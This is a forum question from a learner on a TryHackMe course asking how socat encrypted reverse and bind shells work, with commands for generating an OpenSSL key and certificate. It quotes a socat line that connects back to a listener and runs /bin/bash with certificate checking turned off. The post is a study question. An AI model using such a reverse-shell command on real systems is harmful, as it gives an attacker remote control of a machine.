While studying reverse/bind shells on TryHackMe, I encountered a few lines of code that I am struggling to fully understand their functions. Here is the code in question:
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
-generates an RSA private key. What specifies it as being private and not public?
-generates a certificate, however I thought certificates were mainly used for websites?
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -
-socat is opening a listener with OpenSSL instead of TCP, which I assume starts an endpoint of an encrypted channel.
-This listener is using a .pem file that is created with a line of code not included here, which includes the private key and TLS certificate.
-The listener is being set to run with that certificate, while 'verify=0' ensures it is run without checking its authenticity from a CA.
socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash
-The target connects to the listener by specifying its IP and port number, while also not checking for the authenticity of a certificate.
What exactly is going on here? Why does the machine connecting to the OpenSSL listener not need to provide a key for an encrypted channel? What is the difference between socat TCP-L and socat OPENSSL-L?
If anyone could help by breaking down some of what's happening it'd be greatly appreciated.
